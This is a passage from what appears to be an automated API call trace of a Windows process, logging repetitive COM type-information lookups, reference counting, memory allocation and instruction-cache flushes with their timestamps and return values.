(This=0x7f72088) returned 0x3 [0045.676] IUnknown:AddRef (This=0x7f72138) returned 0x4 [0045.676] IUnknown:Release (This=0x7f72138) returned 0x3 [0045.676] IUnknown:QueryInterface (in: This=0x7f72138, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204778 | out: ppvObject=0x204778*=0x0) returned 0x80004002 [0045.676] IUnknown:QueryInterface (in: This=0x7f72138, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204770 | out: ppvObject=0x204770*=0x0) returned 0x80004002 [0045.676] IUnknown:QueryInterface (in: This=0x7f72088, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2047b0 | out: ppvObject=0x2047b0*=0x0) returned 0x80004002 [0045.676] IUnknown:QueryInterface (in: This=0x7f72088, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2047b8 | out: ppvObject=0x2047b8*=0x0) returned 0x80004002 [0045.676] IUnknown:QueryInterface (in: This=0x7f72088, riid=0x7fee40340f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2047a8 | out: ppvObject=0x2047a8*=0x7f72088) returned 0x0 [0045.676] ITypeInfo2:GetTypeKind (in: This=0x7f72088, pTypeKind=0x204804 | out: pTypeKind=0x204804*=5) returned 0x0 [0045.676] IUnknown:Release (This=0x7f72088) returned 0x4 [0045.676] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72138, ppTypeAttr=0x2040b0, pDummy=0x0 | out: ppTypeAttr=0x2040b0, pDummy=0x0) returned 0x0 [0045.676] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72138) returned 0x0 [0045.676] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72088, ppTypeAttr=0x2040b0, pDummy=0x6 | out: ppTypeAttr=0x2040b0, pDummy=0x6) returned 0x0 [0045.676] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72088) returned 0x0 [0045.676] IUnknown:Release (This=0x7f72138) returned 0x3 [0045.677] IUnknown:Release (This=0x7f72088) returned 0x3 [0045.677] IUnknown:AddRef (This=0x7f72138) returned 0x4 [0045.677] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72138, ppTypeAttr=0x2049c8, pDummy=0x0 | out: ppTypeAttr=0x2049c8, pDummy=0x0) returned 0x0 [0045.677] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72138) returned 0x0 [0045.677] IUnknown:Release (This=0x7f72138) returned 0x3 [0045.677] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.677] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.677] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.677] GetCurrentProcess () returned 0xffffffffffffffff [0045.677] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0045.677] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.677] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72138, ppTypeAttr=0x203f60, pDummy=0x0 | out: ppTypeAttr=0x203f60, pDummy=0x0) returned 0x0 [0045.677] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72138) returned 0x0 [0045.677] IUnknown:Release (This=0x7f723a0) returned 0x5 [0045.677] IUnknown:Release (This=0x7f722f0) returned 0x2 [0045.677] IUnknown:AddRef (This=0x7f723a0) returned 0x6 [0045.677] IUnknown:Release (This=0x7f723a0) returned 0x5 [0045.677] IUnknown:QueryInterface (in: This=0x7f723a0, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2047c8 | out: ppvObject=0x2047c8*=0x0) returned 0x80004002 [0045.678] IUnknown:QueryInterface (in: This=0x7f723a0, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2047c0 | out: ppvObject=0x2047c0*=0x0) returned 0x80004002 [0045.678] IUnknown:AddRef (This=0x7f723a0) returned 0x6 [0045.678] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f723a0, ppTypeAttr=0x204948, pDummy=0x3b023de | out: ppTypeAttr=0x204948, pDummy=0x3b023de*=0x4) returned 0x0 [0045.678] ITypeInfo:LocalReleaseTypeAttr (This=0x7f723a0) returned 0x0 [0045.678] IUnknown:Release (This=0x7f723a0) returned 0x5 [0045.678] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.678] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.678] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.678] GetCurrentProcess () returned 0xffffffffffffffff [0045.678] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0045.678] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.678] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f723a0, ppTypeAttr=0x203ee0, pDummy=0x0 | out: ppTypeAttr=0x203ee0, pDummy=0x0) returned 0x0 [0045.678] ITypeInfo:LocalReleaseTypeAttr (This=0x7f723a0) returned 0x0 [0045.678] IUnknown:Release (This=0x7f7aa08) returned 0x4 [0045.678] IUnknown:Release (This=0x7f7aa08) returned 0x5 [0045.678] IUnknown:Release (This=0x7f7aa08) returned 0x4 [0045.678] IUnknown:QueryInterface (in: This=0x7f7aa08, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204458 | out: ppvObject=0x204458*=0x0) returned 0x80004002 [0045.678] IUnknown:AddRef (This=0x7f7aa08) returned 0x6 [0045.678] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aa08, ppTypeAttr=0x204450, pDummy=0x10 | out: ppTypeAttr=0x204450, pDummy=0x10) returned 0x0 [0045.678] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aa08) returned 0x0 [0045.678] ITypeInfo:GetRefTypeOfImplType (in: This=0x7f7aa08, index=0x0, pRefType=0x204448 | out: pRefType=0x204448*=0x3) returned 0x0 [0045.678] ITypeInfo:GetRefTypeInfo (in: This=0x7f7aa08, hreftype=0x3, ppTInfo=0x204460 | out: ppTInfo=0x204460*=0x8137308) returned 0x0 [0045.679] IUnknown:Release (This=0x7f7aa08) returned 0x5 [0045.679] ITypeInfo:RemoteGetTypeAttr (in: This=0x8137308, ppTypeAttr=0x204450, pDummy=0x204428 | out: ppTypeAttr=0x204450, pDummy=0x204428*=0x3) returned 0x0 [0045.679] ITypeInfo:LocalReleaseTypeAttr (This=0x8137308) returned 0x0 [0045.679] IUnknown:Release (This=0x8137308) returned 0x1 [0045.679] ITypeInfo:RemoteGetDocumentation (in: This=0x7f7aa08, memid=0, refPtrFlags=0x2044d0, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0045.679] IUnknown:Release (This=0x7f7aa08) returned 0x5 [0045.679] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Item", cchWideChar=5, lpMultiByteStr=0x2043e0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Item", lpUsedDefaultChar=0x0) returned 5 [0045.679] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Item") returned 0x107ad7 [0045.679] IUnknown:AddRef (This=0x7f7aa08) returned 0x6 [0045.679] IUnknown:Release (This=0x7f7aa08) returned 0x5 [0045.679] IUnknown:Release (This=0x7f7aa08) returned 0x4 [0045.679] IUnknown:QueryInterface (in: This=0x7f7aa08, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2044e8 | out: ppvObject=0x2044e8*=0x0) returned 0x80004002 [0045.679] IUnknown:QueryInterface (in: This=0x7f7aa08, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2044e0 | out: ppvObject=0x2044e0*=0x0) returned 0x80004002 [0045.679] IUnknown:AddRef (This=0x7f7aa08) returned 0x5 [0045.679] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aa08, ppTypeAttr=0x204738, pDummy=0x3b0265e | out: ppTypeAttr=0x204738, pDummy=0x3b0265e*=0x4) returned 0x0 [0045.679] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aa08) returned 0x0 [0045.679] IUnknown:Release (This=0x7f7aa08) returned 0x4 [0045.680] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.680] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.680] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.680] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.680] GetCurrentProcess () returned 0xffffffffffffffff [0045.680] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x54) returned 1 [0045.680] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.680] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aa08, ppTypeAttr=0x203cd0, pDummy=0x0 | out: ppTypeAttr=0x203cd0, pDummy=0x0) returned 0x0 [0045.680] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aa08) returned 0x0 [0045.680] IUnknown:Release (This=0x7f7aab8) returned 0x5 [0045.680] IUnknown:Release (This=0x7f7aab8) returned 0x4 [0045.680] IUnknown:AddRef (This=0x7f7aab8) returned 0x5 [0045.680] IUnknown:Release (This=0x7f7aab8) returned 0x4 [0045.680] IUnknown:QueryInterface (in: This=0x7f7aab8, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2047c8 | out: ppvObject=0x2047c8*=0x0) returned 0x80004002 [0045.680] IUnknown:QueryInterface (in: This=0x7f7aab8, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2047c0 | out: ppvObject=0x2047c0*=0x0) returned 0x80004002 [0045.680] IUnknown:AddRef (This=0x7f7aab8) returned 0x5 [0045.680] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aab8, ppTypeAttr=0x204a18, pDummy=0x3b0295e | out: ppTypeAttr=0x204a18, pDummy=0x3b0295e*=0x4) returned 0x0 [0045.680] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aab8) returned 0x0 [0045.680] IUnknown:Release (This=0x7f7aab8) returned 0x4 [0045.680] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.680] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.680] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.680] GetCurrentProcess () returned 0xffffffffffffffff [0045.680] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0045.680] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.680] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aab8, ppTypeAttr=0x203fb0, pDummy=0x0 | out: ppTypeAttr=0x203fb0, pDummy=0x0) returned 0x0 [0045.680] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aab8) returned 0x0 [0045.681] IUnknown:Release (This=0x7f7ab68) returned 0x4 [0045.681] IUnknown:Release (This=0x7f7ab68) returned 0x5 [0045.681] IUnknown:Release (This=0x7f7ab68) returned 0x4 [0045.681] IUnknown:QueryInterface (in: This=0x7f7ab68, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204228 | out: ppvObject=0x204228*=0x0) returned 0x80004002 [0045.681] IUnknown:AddRef (This=0x7f7ab68) returned 0x6 [0045.681] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7ab68, ppTypeAttr=0x204220, pDummy=0x10 | out: ppTypeAttr=0x204220, pDummy=0x10) returned 0x0 [0045.681] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7ab68) returned 0x0 [0045.681] ITypeInfo:GetRefTypeOfImplType (in: This=0x7f7ab68, index=0x0, pRefType=0x204218 | out: pRefType=0x204218*=0x3) returned 0x0 [0045.681] ITypeInfo:GetRefTypeInfo (in: This=0x7f7ab68, hreftype=0x3, ppTInfo=0x204230 | out: ppTInfo=0x204230*=0x8137308) returned 0x0 [0045.681] IUnknown:Release (This=0x7f7ab68) returned 0x5 [0045.681] ITypeInfo:RemoteGetTypeAttr (in: This=0x8137308, ppTypeAttr=0x204220, pDummy=0x2041f8 | out: ppTypeAttr=0x204220, pDummy=0x2041f8*=0x3) returned 0x0 [0045.681] ITypeInfo:LocalReleaseTypeAttr (This=0x8137308) returned 0x0 [0045.681] IUnknown:Release (This=0x8137308) returned 0x1 [0045.681] ITypeInfo:RemoteGetDocumentation (in: This=0x7f7ab68, memid=0, refPtrFlags=0x2042a0, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x3ea4440 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x3ea4440*="") returned 0x0 [0045.681] IUnknown:Release (This=0x7f7ab68) returned 0x5 [0045.682] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Text", cchWideChar=5, lpMultiByteStr=0x2041b0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Text", lpUsedDefaultChar=0x0) returned 5 [0045.682] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Text") returned 0x10abed [0045.682] IUnknown:AddRef (This=0x7f7ab68) returned 0x6 [0045.682] IUnknown:Release (This=0x7f7ab68) returned 0x5 [0045.682] IUnknown:Release (This=0x7f7ab68) returned 0x4 [0045.682] IUnknown:QueryInterface (in: This=0x7f7ab68, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2042b8 | out: ppvObject=0x2042b8*=0x0) returned 0x80004002 [0045.682] IUnknown:QueryInterface (in: This=0x7f7ab68, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2042b0 | out: ppvObject=0x2042b0*=0x0) returned 0x80004002 [0045.682] IUnknown:AddRef (This=0x7f7ab68) returned 0x5 [0045.682] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7ab68, ppTypeAttr=0x204508, pDummy=0x3b02bde | out: ppTypeAttr=0x204508, pDummy=0x3b02bde*=0x4) returned 0x0 [0045.682] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7ab68) returned 0x0 [0045.682] IUnknown:Release (This=0x7f7ab68) returned 0x4 [0045.682] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.682] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.682] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.682] GetCurrentProcess () returned 0xffffffffffffffff [0045.682] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0045.682] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.682] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7ab68, ppTypeAttr=0x203aa0, pDummy=0x0 | out: ppTypeAttr=0x203aa0, pDummy=0x0) returned 0x0 [0045.682] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7ab68) returned 0x0 [0045.683] IUnknown:AddRef (This=0x7f72088) returned 0x4 [0045.683] IUnknown:Release (This=0x7f72088) returned 0x3 [0045.683] IUnknown:QueryInterface (in: This=0x7f72088, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2048e8 | out: ppvObject=0x2048e8*=0x0) returned 0x80004002 [0045.683] IUnknown:QueryInterface (in: This=0x7f72088, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2048e0 | out: ppvObject=0x2048e0*=0x0) returned 0x80004002 [0045.683] IUnknown:Release (This=0x7f72138) returned 0x3 [0045.683] IUnknown:Release (This=0x7f72088) returned 0x3 [0045.683] IUnknown:AddRef (This=0x7f72138) returned 0x4 [0045.683] IUnknown:Release (This=0x7f72138) returned 0x3 [0045.683] IUnknown:QueryInterface (in: This=0x7f72138, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204778 | out: ppvObject=0x204778*=0x0) returned 0x80004002 [0045.683] IUnknown:QueryInterface (in: This=0x7f72138, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204770 | out: ppvObject=0x204770*=0x0) returned 0x80004002 [0045.683] IUnknown:QueryInterface (in: This=0x7f72088, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2047b0 | out: ppvObject=0x2047b0*=0x0) returned 0x80004002 [0045.683] IUnknown:QueryInterface (in: This=0x7f72088, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2047b8 | out: ppvObject=0x2047b8*=0x0) returned 0x80004002 [0045.683] IUnknown:QueryInterface (in: This=0x7f72088, riid=0x7fee40340f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2047a8 | out: ppvObject=0x2047a8*=0x7f72088) returned 0x0 [0045.683] ITypeInfo2:GetTypeKind (in: This=0x7f72088, pTypeKind=0x204804 | out: pTypeKind=0x204804*=5) returned 0x0 [0045.683] IUnknown:Release (This=0x7f72088) returned 0x4 [0045.684] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72138, ppTypeAttr=0x2040b0, pDummy=0x0 | out: ppTypeAttr=0x2040b0, pDummy=0x0) returned 0x0 [0045.684] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72138) returned 0x0 [0045.684] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72088, ppTypeAttr=0x2040b0, pDummy=0x6 | out: ppTypeAttr=0x2040b0, pDummy=0x6) returned 0x0 [0045.684] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72088) returned 0x0 [0045.684] IUnknown:Release (This=0x7f72138) returned 0x3 [0045.684] IUnknown:Release (This=0x7f72088) returned 0x3 [0045.684] IUnknown:AddRef (This=0x7f72138) returned 0x4 [0045.684] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72138, ppTypeAttr=0x2049c8, pDummy=0x0 | out: ppTypeAttr=0x2049c8, pDummy=0x0) returned 0x0 [0045.684] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72138) returned 0x0 [0045.684] IUnknown:Release (This=0x7f72138) returned 0x3 [0045.684] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.684] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.684] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.684] GetCurrentProcess () returned 0xffffffffffffffff [0045.684] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0045.684] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.684] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72138, ppTypeAttr=0x203f60, pDummy=0x0 | out: ppTypeAttr=0x203f60, pDummy=0x0) returned 0x0 [0045.684] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72138) returned 0x0 [0045.684] IUnknown:Release (This=0x7f723a0) returned 0x5 [0045.684] IUnknown:Release (This=0x7f722f0) returned 0x2 [0045.684] IUnknown:AddRef (This=0x7f723a0) returned 0x6 [0045.685] IUnknown:Release (This=0x7f723a0) returned 0x5 [0045.685] IUnknown:QueryInterface (in: This=0x7f723a0, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2047c8 | out: ppvObject=0x2047c8*=0x0) returned 0x80004002 [0045.685] IUnknown:QueryInterface (in: This=0x7f723a0, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2047c0 | out: ppvObject=0x2047c0*=0x0) returned 0x80004002 [0045.685] IUnknown:AddRef (This=0x7f723a0) returned 0x6 [0045.685] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f723a0, ppTypeAttr=0x204948, pDummy=0x3b037fe | out: ppTypeAttr=0x204948, pDummy=0x3b037fe*=0x4) returned 0x0 [0045.685] ITypeInfo:LocalReleaseTypeAttr (This=0x7f723a0) returned 0x0 [0045.685] IUnknown:Release (This=0x7f723a0) returned 0x5 [0045.685] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.685] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.685] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.685] GetCurrentProcess () returned 0xffffffffffffffff [0045.685] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0045.685] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.685] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f723a0, ppTypeAttr=0x203ee0, pDummy=0x0 | out: ppTypeAttr=0x203ee0, pDummy=0x0) returned 0x0 [0045.685] ITypeInfo:LocalReleaseTypeAttr (This=0x7f723a0) returned 0x0 [0045.685] IUnknown:Release (This=0x7f7aa08) returned 0x4 [0045.685] IUnknown:Release (This=0x7f7aa08) returned 0x5 [0045.685] IUnknown:Release (This=0x7f7aa08) returned 0x4 [0045.685] IUnknown:QueryInterface (in: This=0x7f7aa08, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204458 | out: ppvObject=0x204458*=0x0) returned 0x80004002 [0045.685] IUnknown:AddRef (This=0x7f7aa08) returned 0x6 [0045.685] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aa08, ppTypeAttr=0x204450, pDummy=0x10 | out: ppTypeAttr=0x204450, pDummy=0x10) returned 0x0 [0045.685] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aa08) returned 0x0 [0045.685] ITypeInfo:GetRefTypeOfImplType (in: This=0x7f7aa08, index=0x0, pRefType=0x204448 | out: pRefType=0x204448*=0x3) returned 0x0 [0045.685] ITypeInfo:GetRefTypeInfo (in: This=0x7f7aa08, hreftype=0x3, ppTInfo=0x204460 | out: ppTInfo=0x204460*=0x8137308) returned 0x0 [0045.686] IUnknown:Release (This=0x7f7aa08) returned 0x5 [0045.686] ITypeInfo:RemoteGetTypeAttr (in: This=0x8137308, ppTypeAttr=0x204450, pDummy=0x204428 | out: ppTypeAttr=0x204450, pDummy=0x204428*=0x3) returned 0x0 [0045.686] ITypeInfo:LocalReleaseTypeAttr (This=0x8137308) returned 0x0 [0045.686] IUnknown:Release (This=0x8137308) returned 0x1 [0045.686] ITypeInfo:RemoteGetDocumentation (in: This=0x7f7aa08, memid=0, refPtrFlags=0x2044d0, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0045.686] IUnknown:Release (This=0x7f7aa08) returned 0x5 [0045.686] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Item", cchWideChar=5, lpMultiByteStr=0x2043e0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Item", lpUsedDefaultChar=0x0) returned 5 [0045.686] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Item") returned 0x107ad7 [0045.686] IUnknown:AddRef (This=0x7f7aa08) returned 0x6 [0045.686] IUnknown:Release (This=0x7f7aa08) returned 0x5 [0045.686] IUnknown:Release (This=0x7f7aa08) returned 0x4 [0045.686] IUnknown:QueryInterface (in: This=0x7f7aa08, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2044e8 | out: ppvObject=0x2044e8*=0x0) returned 0x80004002 [0045.686] IUnknown:QueryInterface (in: This=0x7f7aa08, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2044e0 | out: ppvObject=0x2044e0*=0x0) returned 0x80004002 [0045.686] IUnknown:AddRef (This=0x7f7aa08) returned 0x5 [0045.686] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aa08, ppTypeAttr=0x204738, pDummy=0x3b03a7e | out: ppTypeAttr=0x204738, pDummy=0x3b03a7e*=0x4) returned 0x0 [0045.686] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aa08) returned 0x0 [0045.686] IUnknown:Release (This=0x7f7aa08) returned 0x4 [0045.686] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.686] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.687] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.687] IMalloc:GetSize 